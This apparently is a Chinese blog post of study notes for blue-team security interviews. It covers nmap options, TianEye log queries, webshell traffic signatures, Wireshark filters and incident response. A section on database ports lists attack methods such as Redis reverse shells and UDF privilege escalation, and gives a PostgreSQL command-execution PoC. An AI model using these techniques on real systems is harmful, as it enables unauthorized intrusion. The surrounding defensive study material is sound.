<li>-sP ping扫描，Nmap在扫描端⼜时，默认都会使⽤ping扫描，只有主机存活，Nmap才会继续扫描。</li>
<li>-sU UDP扫描，但UDP扫描是不可靠的，速度也比较慢</li>
<li>-sA 这种扫描与目前为止讨论的其它扫描的不同之处在于 它不能确定open(开放的)或者 open|filtered(开放或者过滤的))端口。 它用于发现防火墙规则，确定它们是有状态的还是无状态的，哪些端口是被过滤的。</li>
<li>-sV 探测端⼜服务版本</li>
<li>-Pn 扫描之前不需要⽤ping命令，有些防⽕墙禁⽌ping命令。可以使⽤此选项进⾏扫描</li>
<li>-v 显⽰扫描过程，推荐使⽤</li>
<li>-p 指定端⼜，如“1-65535、1433、135、22、80”等</li>
<li>-O 启⽤远程操作系统检测，存在误报</li>
<li>-O –osscan-limit 针对指定的目标进行操作系统检测</li>
<li>-O –osscan-guess 当Nmap无法确定所检测的操作系统时，会尽可能地提供最相近的匹配，Nmap默认 进行这种匹配</li>
<li>-A 全⾯系统检测、启⽤脚本检测、扫描等</li>
<li>-oN&#x2F;-oX&#x2F;-oG 将报告写⼊⽂件，分别是正常、XML、grepable 三种格式</li>
<li>-iL 读取主机列表，例如，-iL “C:\ip.txt”</li>
</ul>
<h3 id="天眼可以检测逻辑漏洞吗"><a href="#天眼可以检测逻辑漏洞吗" class="headerlink" title="天眼可以检测逻辑漏洞吗"></a>天眼可以检测逻辑漏洞吗</h3><p>天眼的漏洞扫描模块主要基于静态代码分析和黑盒测试技术，对于逻辑漏洞的检测能力相对有限。</p>
<h3 id="内网渗透工具，代理"><a href="#内网渗透工具，代理" class="headerlink" title="内网渗透工具，代理"></a>内网渗透工具，代理</h3><h3 id="渗透测试流程"><a href="#渗透测试流程" class="headerlink" title="渗透测试流程"></a>渗透测试流程</h3><ul>
<li>确定目标和范围：定义渗透测试的目标和范围，包括要测试的系统、应用程序、网络、物理设施等。</li>
<li>收集情报：收集有关目标系统的信息，例如 IP 地址、操作系统类型、应用程序版本、网络拓扑等，以便进行后续测试。</li>
<li>漏洞扫描：使用漏洞扫描工具对目标系统进行扫描，以发现已知的漏洞和弱点。</li>
<li>渗透测试：通过手动测试和自动化工具进行渗透测试，包括尝试各种攻击向量，如 SQL 注入、XSS 攻击、文件包含漏洞、社交工程等。</li>
<li>提交漏洞报告：将发现的漏洞和安全弱点整理成报告，详细描述漏洞的影响和风险，并提供建议和修复措施。</li>
<li>清理痕迹：在测试完成后，清除所有测试过程中留下的痕迹，确保不会对目标系统造成任何影响或损害。</li>
<li>重复测试：在修复漏洞后，进行重复测试以确认漏洞已被修复，并且没有引入新的漏洞。</li>
</ul>
<h3 id="天眼日志分析语法"><a href="#天眼日志分析语法" class="headerlink" title="天眼日志分析语法"></a>天眼日志分析语法</h3><p>天眼日志分析语法（TianEye Log Query Syntax）是指在奇安信的天眼平台上，用于查询、分析和可视化各种日志数据的语法。以下是一些常见的天眼日志分析语法示例：</p>
<ol>
<li>关键字查询：使用关键字查询指定时间段内的日志数据。例如，查询访问时间为2022年4月1日至4月30日之间的所有日志：</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index=xxx sourcetype=yyy access_time&gt;=2022-04-01 access_time&lt;=2022-04-30</span><br></pre></td></tr></table></figure>

<p>精确匹配查询：使用精确匹配查询指定某个字段的值。例如，查询客户端 IP 地址为 192.168.1.100 的所有日志：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index=xxx sourcetype=yyy client_ip=192.168.1.100</span><br></pre></td></tr></table></figure>

<p>多条件查询：使用多个条件查询组合查询结果。例如，查询客户端 IP 地址为 192.168.1.100，且访问时间为2022年4月1日至4月30日之间的所有日志：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index=xxx sourcetype=yyy client_ip=192.168.1.100 access_time&gt;=2022-04-01 access_time&lt;=2022-04-30</span><br></pre></td></tr></table></figure>

<p>聚合查询：使用聚合函数统计查询结果。例如，查询某个时间段内 HTTP 访问次数最多的前 10 个客户端 IP 地址：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index=xxx sourcetype=yyy access_time&gt;=2022-04-01 access_time&lt;=2022-04-30 | top 10 client_ip</span><br></pre></td></tr></table></figure>

<p>可视化查询：使用可视化组件将查询结果可视化。例如，使用柱状图可视化某个时间段内 HTTP 访问次数最多的前 10 个客户端 IP 地址：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index=xxx sourcetype=yyy access_time&gt;=2022-04-01 access_time&lt;=2022-04-30 | </span><br></pre></td></tr></table></figure>

<h3 id="天眼流量分析和威胁检测区别"><a href="#天眼流量分析和威胁检测区别" class="headerlink" title="天眼流量分析和威胁检测区别"></a>天眼流量分析和威胁检测区别</h3><p>天眼流量分析和威胁检测是奇安信的天眼平台提供的两个不同的功能模块，它们的主要区别如下：</p>
<ol>
<li>功能目标不同：天眼流量分析的主要目标是分析网络流量，了解网络拓扑结构、通信情况和性能状况，发现网络异常和瓶颈问题等；而威胁检测的主要目标是检测和预防网络威胁和攻击，包括漏洞扫描、入侵检测、恶意代码检测、网络流量分析等多个方面。</li>
<li>数据来源不同：天眼流量分析主要关注网络流量数据，可以采集和分析网络设备、流量数据、协议、应用等方面的数据；而威胁检测则需要多种数据源的支持，如安全事件日志、主机安全数据、网络安全数据、终端安全数据等。</li>
<li>数据处理方式不同：天眼流量分析主要采用流量抓包、协议解析、拓扑分析等技术进行数据处理和分析；而威胁检测则采用多种技术手段进行数据处理和分析，如恶意代码识别、行为分析、异常检测、漏洞扫描等。</li>
<li>应用场景不同：天眼流量分析主要适用于网络运维、网络性能分析、网络安全监控等领域；而威胁检测则适用于网络安全、信息安全等领域，可以帮助企业发现和防范各种网络威胁和攻击。</li>
</ol>
<h3 id="天眼可以审0day吗"><a href="#天眼可以审0day吗" class="headerlink" title="天眼可以审0day吗"></a>天眼可以审0day吗</h3><p>不可以</p>
<h3 id="怎么判断自己的机器是不是域控"><a href="#怎么判断自己的机器是不是域控" class="headerlink" title="怎么判断自己的机器是不是域控"></a>怎么判断自己的机器是不是域控</h3><ol>
<li>打开计算机管理器：在 Windows 操作系统中，可以通过在开始菜单中搜索“计算机管理器”来打开计算机管理器。</li>
<li>查看域：在计算机管理器中，展开“本地用户和组”或“计算机管理”等选项卡，然后选择“域”。如果机器加入了域并成为域控制器，将会在此处看到域的名称和其他域控制器的信息。</li>
<li>检查服务：在 Windows 操作系统中，域控制器会运行一些特定的服务，比如“Active Directory域服务”，“DNS服务器服务”等。可以通过打开“服务”选项卡来查看这些服务是否在运行，并且是否是自动启动。</li>
<li>检查系统信息：在 Windows 操作系统中，可以通过打开“系统信息”来查看机器的详细信息。在其中的“系统摘要”选项卡中，如果机器是域控制器，将会看到“角色”一栏显示“域控制器”。</li>
</ol>
<h3 id="常见webshell流量体征"><a href="#常见webshell流量体征" class="headerlink" title="常见webshell流量体征"></a>常见webshell流量体征</h3><ul>
<li>异常流量：Webshell的流量通常会显示为异常流量，因为攻击者通常会通过Webshell上传和下载文件、执行命令等操作，这些操作都会产生大量不正常的流量。</li>
<li>带有特定字符或字符串：Webshell可能会带有特定字符或字符串，如“eval(base64_decode(”，这些字符或字符串用于解码Webshell的命令或脚本，攻击者可能会使用这些字符或字符串来隐藏Webshell。</li>
<li>频繁访问：Webshell的访问可能会比正常的用户访问频率更高，这是因为攻击者需要不断访问Webshell以获取控制目标服务器的权限。</li>
<li>长时间运行的连接：Webshell的流量可能会包含长时间运行的连接，这是因为攻击者通常会保持Webshell的连接以便在需要时执行更多的操作。</li>
<li>异常文件：Webshell可能会通过上传和下载文件来执行操作，因此出现异常文件或文件类型也可能是Webshell的流量体征。</li>
</ul>
<h3 id="常用数据库默认端口及漏洞"><a href="#常用数据库默认端口及漏洞" class="headerlink" title="常用数据库默认端口及漏洞"></a>常用数据库默认端口及漏洞</h3><ul>
<li><p>89 端口（ldap）安全漏洞：未授权访问 、弱口令<br>利用方式：通过LdapBrowser工具直接连入。</p>
</li>
<li><p>1433 端口（Mssql）安全漏洞：弱口令、暴力破解<br>利用方式：差异备份getshell、SA账户提权等</p>
</li>
<li><p>1521 端口（Oracle）安全漏洞：弱口令、暴力破解<br>利用方式：通过弱口令&#x2F;暴力破解进行入侵。</p>
</li>
<li><p>3306 端口（MySQL）安全漏洞：弱口令、暴力破解<br>利用方式：利用日志写入webshell、udf提权、mof提权等。</p>
</li>
<li><p>5432 端口（ PostgreSQL）安全漏洞：弱口令、高权限命令执行<br>利用方式：攻击者通过弱口令获取账号信息，连入postgres中，可执行系统命令。PoC参考： DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM ‘id’; SELECT * FROM cmd_exec;</p>
</li>
<li><p>5984 端口（CouchDB）安全漏洞：垂直权限绕过、任意命令执行<br>利用方式：通过构造数据创建管理员用户，使用管理员用户登录，构造恶意请求触发任意命令执行。后台访问：http:&#x2F;&#x2F;:5984&#x2F;_utils</p>
</li>
<li><p>6379 端口（Redis）安全漏洞：未授权访问<br>利用方式：绝对路径写webshell 、利用计划任务执行命令反弹shell、公私钥认证获取root权限、主从复制RCE等。</p>
</li>
<li><p>9200 端口（elasticsearch）安全漏洞：未授权访问、命令执行</p>
</li>
</ul>
<h3 id="目标ip是邮件服务器要怎么处理"><a href="#目标ip是邮件服务器要怎么处理" class="headerlink" title="目标ip是邮件服务器要怎么处理"></a>目标ip是邮件服务器要怎么处理</h3><ol>
<li>检查邮件服务器是否正常运行：您可以通过尝试连接到邮件服务器并发送一封电子邮件来检查邮件服务器是否正常运行。如果邮件服务器无法连接或无法发送电子邮件，则可能需要检查邮件服务器的配置或网络设置。</li>
<li>检查安全设置：邮件服务器需要设置安全措施以保护电子邮件和用户数据，如防火墙、反病毒软件和邮件过滤器等。您可以检查这些设置是否已启用或需要进行更新。</li>
<li>更新邮件服务器软件：如果您的邮件服务器软件已经过时，可能需要更新到最新版本以修复可能存在的安全漏洞和错误。</li>
<li>监控邮件服务器流量：监控邮件服务器的流量可以帮助您识别和防止未经授权的访问或攻击。您可以使用日志分析工具或流量监控工具来监控邮件服务器的流量，并检查是否存在异常活动。</li>
<li>增强安全措施：除了基本的安全措施，您还可以考虑增强邮件服务器的安全措施，如强密码策略、多因素身份验证和加密等。这些措施可以帮助保护邮件服务器免受恶意</li>
</ol>
<h3 id="目的ip是114-114-114-114端口是53需要封禁吗"><a href="#目的ip是114-114-114-114端口是53需要封禁吗" class="headerlink" title="目的ip是114.114.114.114端口是53需要封禁吗"></a>目的ip是114.114.114.114端口是53需要封禁吗</h3><h3 id="群里面遇到exe可执行程序怎么处理"><a href="#群里面遇到exe可执行程序怎么处理" class="headerlink" title="群里面遇到exe可执行程序怎么处理"></a>群里面遇到exe可执行程序怎么处理</h3><ol>
<li>不要下载或运行未知来源的可执行程序。如果你不确定该程序是否安全，请询问发送者或其他群组成员。</li>
<li>使用杀毒软件进行扫描。如果你已经下载了该程序并想运行它，可以使用杀毒软件进行扫描，以确保它不包含任何恶意软件。</li>
<li>隔离该文件。如果你怀疑该程序可能会造成破坏，请将其隔离在一个安全的位置，以防止其对你的计算机系统造成任何影响。</li>
<li>通知管理员。如果你认为该程序可能会对其他群组成员造成威胁，请及时通知管理员或相关人员，并让他们采取适当的措施来处理该问题。</li>
<li>虚拟机打开</li>
</ol>
<h3 id="遇到远控木马告警如何处理"><a href="#遇到远控木马告警如何处理" class="headerlink" title="遇到远控木马告警如何处理"></a>遇到远控木马告警如何处理</h3><ol>
<li>立即断开网络连接。为了防止该木马进一步攻击计算机或服务器，你应该立即断开网络连接，包括断开无线网络和网线连接等。</li>
<li>扫描计算机或服务器。使用安全软件对计算机或服务器进行全面扫描，以检测和清除远控木马。确保使用更新的杀毒软件，以提高检测和清除恶意软件的能力。</li>
<li>更改密码。更改所有重要帐户的密码，例如电子邮件、在线银行、社交媒体等。确保密码是复杂且难以猜测的，建议使用密码管理器。</li>
<li>及时备份数据。备份所有重要数据，包括文件、文档、照片等，以防止数据丢失。</li>
<li>更新操作系统和软件。确保计算机或服务器上的操作系统和所有软件都是最新的，以填补可能的安全漏洞。</li>
<li>通知安全管理员。如果你在工作环境中发现远控木马，应立即通知安全管理员或信息安全团队，并遵循公司的安全政策和流程。</li>
</ol>
<h3 id="cs"><a href="#cs" class="headerlink" title="cs"></a>cs</h3><p>一款渗透测试神器</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/zzwwhhpp/article/details/111773395" >https://blog.csdn.net/zzwwhhpp/article/details/111773395<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="wireshark过滤条件"><a href="#wireshark过滤条件" class="headerlink" title="wireshark过滤条件"></a>wireshark过滤条件</h3><p>ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107</p>
<p>或者</p>
<p>ip.addr eq 192.168.1.107 &#x2F;&#x2F; 都能显示来源IP和目标IP</p>
<p>tcp.port eq 80 &#x2F;&#x2F; 不管端口是来源的还是目标的都显示</p>
<p>tcp.port &#x3D;&#x3D; 80</p>
<p>tcp.port eq 2722</p>
<p>tcp.port eq 80 or udp.port eq 80</p>
<p>tcp.dstport &#x3D;&#x3D; 80 &#x2F;&#x2F; 只显tcp协议的目标端口80</p>
<p>tcp.srcport &#x3D;&#x3D; 80 &#x2F;&#x2F; 只显tcp协议的来源端口80</p>
<p> udp.port eq 15000</p>
<p> 过滤端口范围</p>
<p>tcp.port &gt;&#x3D; 1 and tcp.port &lt;&#x3D; 80</p>
<p>th.dst &#x3D;&#x3D; A0:00:00:04:C5:84 &#x2F;&#x2F; 过滤目标mac</p>
<p>eth.src eq A0:00:00:04:C5:84 &#x2F;&#x2F; 过滤来源mac</p>
<p>eth.dst&#x3D;&#x3D;A0:00:00:04:C5:84</p>
<p>eth.dst&#x3D;&#x3D;A0-00-00-04-C5-84</p>
<p>eth.addr eq A0:00:00:04:C5:84 &#x2F;&#x2F; 过滤来源MAC和目标MAC都等于A0:00:00:04:C5:84的</p>
<p>http.request.method &#x3D;&#x3D; “GET”</p>
<p>http.request.method &#x3D;&#x3D; “POST”</p>
<p>http.request.uri &#x3D;&#x3D; “&#x2F;img&#x2F;logo-edu.gif”</p>
<p>http contains “GET”</p>
<p>http contains “HTTP&#x2F;1.”</p>
<h3 id="shiro反序列化漏洞"><a href="#shiro反序列化漏洞" class="headerlink" title="shiro反序列化漏洞"></a>shiro反序列化漏洞</h3><p>1.1.3 漏洞原理</p>
<p>  Apache Shiro框架提供了记住我的功能（RememberMe），用户登录成功后会生成经过加密并编码的cookie。cookie的key为RememberMe，cookie的值是经过相关信息进行序列化，然后使用AES加密（对称），最后再使用Base64编码处理。服务端在接收cookie时：</p>
<p>攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造用户的Cookie，服务端反序列化时触发漏洞，从而执行命令</p>
<h3 id="蚁剑流量特征"><a href="#蚁剑流量特征" class="headerlink" title="蚁剑流量特征"></a>蚁剑流量特征</h3><p>1.默认的 user-agent 请求头是 antsword xxx（可修改）</p>
<p> 2.蚁剑的正文内容用URL加密，解密后流量最中明显的特征为ini_set(“display_errors”,”0”);</p>
<h3 id="勒索病毒传播方式有哪些"><a href="#勒索病毒传播方式有哪些" class="headerlink" title="勒索病毒传播方式有哪些"></a>勒索病毒传播方式有哪些</h3><ul>
<li>网站挂马：用户浏览挂有木马病毒的网站，上网终端计算机系统极可能被植入木马并感染上勒索病毒。</li>
<li>邮件传播：攻击者通过利用当前热门字样，在互联网上撒网式发送垃圾邮件、钓鱼邮件，一旦收件人点开带有勒索病毒的链接或附件，勒索病毒就会在计算机后台静默运行，实施勒索。</li>
<li>漏洞传播：攻击者通过计算机操作系统和应用软件的漏洞攻击并植入病毒，最典型的案例是2017年在国内泛滥的WannaCry大规模勒索事件，攻击者正是利用微软445端口协议漏洞，进行感染传播网内计算机。</li>
<li>捆绑传播：攻击者将勒索病毒与其他软件尤其是盗版软件、非法破解软件、激活工具进行捆绑，从而诱导用户点击下载安装，并随着宿主文件的捆绑安装进而感染用户的计算机系统。</li>
<li>介质传播：攻击者通过提前植入或通过交叉使用感染等方式将携有勒索病毒的U盘、光盘等介质进行勒索病毒的移动式传播。</li>
</ul>
<h3 id="log4j漏洞"><a href="#log4j漏洞" class="headerlink" title="log4j漏洞"></a>log4j漏洞</h3><p>该漏洞的主要原因是log4j在日志输出中，未对字符合法性进行严格的限制，执行了JNDI协议加载的远程恶意脚本，从而造成RCE</p>
<h3 id="wireshark抓到数据包之后你怎么去分析"><a href="#wireshark抓到数据包之后你怎么去分析" class="headerlink" title="wireshark抓到数据包之后你怎么去分析"></a>wireshark抓到数据包之后你怎么去分析</h3><h3 id="redis-mongodb端口号"><a href="#redis-mongodb端口号" class="headerlink" title="redis mongodb端口号"></a>redis mongodb端口号</h3><p>redis 6379   </p>
<p>mongoDB 27017</p>
<h3 id="天眼探针有什么功能"><a href="#天眼探针有什么功能" class="headerlink" title="天眼探针有什么功能"></a>天眼探针有什么功能</h3><h3 id="天眼能否检索网络日志"><a href="#天眼能否检索网络日志" class="headerlink" title="天眼能否检索网络日志"></a>天眼能否检索网络日志</h3><h3 id="struct2命令执行漏洞"><a href="#struct2命令执行漏洞" class="headerlink" title="struct2命令执行漏洞"></a>struct2命令执行漏洞</h3><p>Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式，并将用户通过URL提交的内容拼接入Ognl表达式中，从而造成攻击者可以通过构造恶意URL来执行任意Java代码，进而可执行任意命令</p>
<h3 id="如果目的端口为-x-X-x-x-操作系统win7或者win8，检索语句要怎么写"><a href="#如果目的端口为-x-X-x-x-操作系统win7或者win8，检索语句要怎么写" class="headerlink" title="如果目的端口为: x.X.x.x,操作系统win7或者win8，检索语句要怎么写"></a>如果目的端口为: x.X.x.x,操作系统win7或者win8，检索语句要怎么写</h3><h3 id="怎么写模糊查询告警类型为写入文件的检索语句"><a href="#怎么写模糊查询告警类型为写入文件的检索语句" class="headerlink" title="怎么写模糊查询告警类型为写入文件的检索语句"></a>怎么写模糊查询告警类型为写入文件的检索语句</h3><h3 id="如果出现两条相同的sql注入告警你会怎么处理"><a href="#如果出现两条相同的sql注入告警你会怎么处理" class="headerlink" title="如果出现两条相同的sql注入告警你会怎么处理"></a>如果出现两条相同的sql注入告警你会怎么处理</h3><h3 id="如果出现蠕虫病毒告警，如何处理"><a href="#如果出现蠕虫病毒告警，如何处理" class="headerlink" title="如果出现蠕虫病毒告警，如何处理"></a>如果出现蠕虫病毒告警，如何处理</h3><h3 id="php命令执行函数"><a href="#php命令执行函数" class="headerlink" title="php命令执行函数"></a>php命令执行函数</h3><p><strong>system()，passthru()，exec()，pcntl_exec()，shell_exec()，popen()&#x2F;proc_popen()，反引号 &#96;&#96;</strong></p>
<h3 id="冰蝎流量特征"><a href="#冰蝎流量特征" class="headerlink" title="冰蝎流量特征"></a>冰蝎流量特征</h3><p>Accept: application&#x2F;json, text&#x2F;javascript, <em>&#x2F;</em>; q&#x3D;0.01</p>
<p>Content-type: Application&#x2F;x-www-form-urlencoded</p>
<p>冰蝎设置了10种User-Agent,每次连接shell时会随机选择一个进行使用。</p>
<p>冰蝎与webshell建立连接的同时，javaw也与目的主机建立tcp连接，每次连接使用本地端口在49700左右，每连接一次，每建立一次新的连接，端口就依次增加。</p>
<p>$post&#x3D;Decrypt(file_get_contents(“php:&#x2F;&#x2F;input”));</p>
<h3 id="哥斯拉流量特征"><a href="#哥斯拉流量特征" class="headerlink" title="哥斯拉流量特征"></a>哥斯拉流量特征</h3><p>Accept为text&#x2F;html, image&#x2F;gif, image&#x2F;jpeg, *; q&#x3D;.2, <em>&#x2F;</em>; q&#x3D;.2</p>
<p>cookie中分号结尾</p>
<p>和请求体一样，请求响应体也分两个格式，base64编码的和原始加密raw数据。如果请求体采用base64编码，响应体返回的也是base64编码的数据。在使用base64编码时，响应体会出现一个很明显的固定特征。这个特征是客户端和服务端编写的时候引入的。</p>
<p>从代码可以看到会把一个32位的md5字符串按照一半拆分，分别放在base64编码的数据的前后两部分。整个响应包的结构体征为：md5前十六位+base64+md5后十六位。<br>从响应数据包可以明显看到这个特征，检测时匹配这个特征可以达到比较高的检出率，同时也只可以结合前面的一些弱特征进行检查，进一步提高检出率。因为md5的字符集范围在只落在0123456789ABCDEF范围内，因此很容易去匹配，正则匹配类似于(?i:[0-9A-F]{16})[\w+&#x2F;]{4,}&#x3D;?&#x3D;?(?i:[0-9A-F]{16})。需要注意的是md5需要同时匹配字母大小写两种情况，因为在JAVA版webshell响应中为大写字母，在PHP版中为小写字母。</p>
<h3 id="发现有入侵攻击，查看主机的哪些日志"><a href="#发现有入侵攻击，查看主机的哪些日志" class="headerlink" title="发现有入侵攻击，查看主机的哪些日志"></a>发现有入侵攻击，查看主机的哪些日志</h3><p>&#x2F;var&#x2F;log&#x2F;</p>
<h3 id="如何防范反序列化漏洞"><a href="#如何防范反序列化漏洞" class="headerlink" title="如何防范反序列化漏洞"></a>如何防范反序列化漏洞</h3><p>防范反序列化漏洞的方法主要包括以下几点：</p>
<ol>
<li>输入过滤：在接收用户输入时，进行有效性验证和输入过滤，避免恶意输入。</li>
<li>对象序列化前加密：对即将进行序列化的对象中的敏感数据或者方法进行加密处理，避免序列化后数据被篡改。</li>
<li>签名校验：利用数字签名技术，在序列化和反序列化的过程中添加签名机制，校验序列化对象是否经过篡改。</li>
<li>更新库文件：定期更新使用的序列化库文件，避免因为库文件中的漏洞而导致反序列化漏洞的产生。</li>
<li>减少依赖第三方类库：减少依赖第三方类库的情况，避免由于第三方类库中的漏洞而导致反序列化漏洞的产生。</li>
<li>最小化序列化：精简序列化对象中的属性，避免不必要的属性被序列化，从而降低反序列化的风险。</li>
</ol>
<p>以上是防范反序列化漏洞的一些基本方案。此外，如果使用的是Java语言，还可以通过Java Security Manager来控制反序列化操作的权限。在开发项目时，应该尽可能地避免使用Java反序列化操作，或者在进行序列化和反序列化操作时，更加谨慎的写好对应的代码和相关配置。</p>
<h3 id="天眼上显示多个不同url的SQL注入告警，可能是什么原因？"><a href="#天眼上显示多个不同url的SQL注入告警，可能是什么原因？" class="headerlink" title="天眼上显示多个不同url的SQL注入告警，可能是什么原因？"></a>天眼上显示多个不同url的SQL注入告警，可能是什么原因？</h3><p>可能是网站存在多个不同的漏洞点，或者攻击者利用了不同的注入方式和参数来尝试注入，导致出现多个不同的SQL注入告警。此外，也有可能是天眼扫描器在扫描过程中出现了误报或者漏报情况，需要对告警进行仔细分析和验证。建议及时修复漏洞点，防范SQL注入等安全威胁。</p>
<h3 id="我们在天眼上遇到文件上传告警时，应急响应的流程是怎样的？-同一台资产多次发出同一个告警，可能的原因？"><a href="#我们在天眼上遇到文件上传告警时，应急响应的流程是怎样的？-同一台资产多次发出同一个告警，可能的原因？" class="headerlink" title="我们在天眼上遇到文件上传告警时，应急响应的流程是怎样的？ 同一台资产多次发出同一个告警，可能的原因？"></a>我们在天眼上遇到文件上传告警时，应急响应的流程是怎样的？ 同一台资产多次发出同一个告警，可能的原因？</h3><p>应对文件上传告警的应急响应流程一般包括如下步骤：</p>
<ol>
<li>确认告警情况：查看告警详细信息，包括文件类型、大小、上传时间、上传者、上传路径、上传方式、来源IP等，判断是否存在风险。</li>
<li>暂停上传功能：对于存在风险的上传功能，需要暂停上传功能，防止攻击者持续上传。</li>
<li>验证漏洞点：对上传功能进行全面测试，确认漏洞点，包括上传参数的类型、限制、验证等。</li>
<li>修复漏洞点：根据漏洞点的验证结果，提供相应的解决方案和实施措施，比如对上传文件进行类型、大小、扩展名、后缀名等多个方面的限制。</li>
<li>监测告警情况：在上传功能修复后，需对文件上传行为进行全面监测，查看是否仍然存在风险。</li>
</ol>
<p>同一台资产多次发出同一个告警可能是以下原因：</p>
<ol>
<li>真实存在的漏洞：同一漏洞点被攻击者利用多次，导致多次告警。</li>
<li>系统误报：扫描器或监测设备存在误报，由于告警下发频繁，导致同一漏洞多次告警。</li>
<li>前置设备异常：网络设备、WAF等前置设备异常，导致同一个请求被多次拦截，产生多次告警。</li>
</ol>
<p>在排查告警原因时，需要进行仔细分析和判断，以确认是否存在真实风险。需要及时对真实漏洞进行修复和防范，对于误报和异常情况则需要针对性的进行排查和修复。</p>
<h3 id="linux临时文件位置"><a href="#linux临时文件位置" class="headerlink" title="linux临时文件位置"></a>linux临时文件位置</h3><p>在Linux系统中，临时文件通常放置在以下几个目录中：</p>
<ol>
<li>&#x2F;tmp目录：该目录是Linux系统中最常用的临时文件目录之一，任意用户都可以在该目录中创建、修改、删除文件。该目录下的文件在系统重启后会被清空。</li>
<li>&#x2F;var&#x2F;tmp目录：该目录和&#x2F;tmp目录类似，不同之处在于该目录下的文件在系统重启后不会被清空，需要手动删除。</li>
<li>&#x2F;dev&#x2F;shm目录：该目录是一个ramfs文件系统，在内存中创建一个文件系统，并且把该文件系统挂载到&#x2F;dev&#x2F;shm目录下。该目录也可以作为临时文件目录使用，因为文件在内存中创建，所以读写速度较快。</li>
</ol>
<p>除了上述目录之外，还有一些应用程序会自己创建临时文件目录，例如Apache创建的临时文件夹为&#x2F;var&#x2F;cache&#x2F;httpd，Nginx创建的临时文件目录为&#x2F;var&#x2F;run&#x2F;nginx&#x2F;client_body_temp。</p>
<p>需要注意的是，在使用临时文件时，应尽可能使用系统默认的临时文件目录，避免用在不安全或者没有权限控制的目录。临时文件的权限也应该设置为仅能被创建者和目录管理员使用，并尽可能定期清理，以降低系统安全风险。</p>
<h3 id="使用天眼遇到sql告警怎么处理"><a href="#使用天眼遇到sql告警怎么处理" class="headerlink" title="使用天眼遇到sql告警怎么处理"></a>使用天眼遇到sql告警怎么处理</h3><p>处理天眼上的SQL告警，一般需要按照以下步骤进行：</p>
<ol>
<li>核实告警：对收到的告警首先进行核实，查看告警详情以确认告警是否为真实漏洞。</li>
<li>定位漏洞：确认告警存在后，需要进行漏洞定位，以查找漏洞原因和具体位置，检查SQL查询参数、输入过滤、数据库配置等方面。</li>
<li>修复漏洞：根据定位得到的漏洞内容，进行相应的安全加固和漏洞修复，比如优化SQL查询语句、加强输入过滤、修复数据库配置等。</li>
<li>验证修复结果：在修复漏洞后，需要再次测试系统以验证修复结果，确保系统安全性得到提高。</li>
<li>预防未来漏洞：在修复漏洞之后，需要对SQL注入漏洞进一步加强防范和监测，避免类似漏洞重演。</li>
</ol>
<p>需要注意的是，上述过程应该配合严格的访问控制和身份认证机制，并进行安全审计来保证系统的安全性。另外，如果使用天眼监测到SQL注入漏洞的话，可以结合其他安全工具如WAF来对系统进行进一步防御。通过不断加强安全防护链的研发和落地，能让系统安全得到有力地提升。</p>

                </div>
                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                HW prepare
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2023/04/12/HW prepare/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">P1taya</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2023-04-12 21:20</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2023/05/02/Ruby%E5%AE%89%E5%85%A8%E5%88%9D%E6%8E%A2/"
                                   title="Ruby安全初探"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">Ruby安全初探</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2023/04/06/%E9%9D%A2%E8%AF%95prepare/"
                                   title="面试prepare"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">面试prepare</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
